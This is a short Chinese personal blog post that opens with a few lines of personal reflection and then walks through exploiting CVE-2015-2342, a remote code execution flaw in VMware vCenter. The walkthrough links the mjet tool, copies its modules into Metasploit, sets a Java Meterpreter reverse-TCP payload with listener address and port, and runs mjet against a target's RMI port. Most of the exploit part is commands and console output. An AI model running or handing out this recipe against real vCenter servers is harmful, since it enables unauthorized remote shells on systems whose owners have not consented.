Sh4dow's Blog

活了二十几年,从来没有人给过我一次意外感动或惊喜,也没有人在我生日的时候给过我特别的礼物,生病的时候得到的只是一些不在身边的语言安慰,也不见谁真正的照顾过自己,甚至有的时候自己蒙头睡一觉就好了,也有人喜欢过我,但是从没见谁坚持过。

CVE-2015-2342:VMware vCenter 远程执行漏洞利用

测试主机:kali 2.0

利用工具:

https://github.com/mogwaisec/mjet


把下载文件中MBean目录烤到/usr/share/metasploit-framework/data/java/metasploit/MBean/目录

mlet_server 拷到:modules/exploits/multi/misc/


直接msfconsole去使用模块

set payload java/meterpreter/reverse_tcp

set LHOST 192.168.220.130

set LPORT 4444

run

[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: https://0.0.0.0:8080/HssbLgOrMj8
msf exploit(java_mlet_server) > [*] Local IP: https://192.168.220.132:8080/HssbLgOrMj8
[*] Server started.

再运行


java -jar mjet.jar -t 192.168.220.130 -p 9875 -u https://192.168.220.130:8080/HssbLgOrMj8

就ok 了。

-p是 java-rmi的端口

其实问题是:https://www.exploit-db.com/exploits/36101/ 一样。

无故躺中枪。



评论 ( 1 )

© Sh4dow's Blog | Powered by LOFTER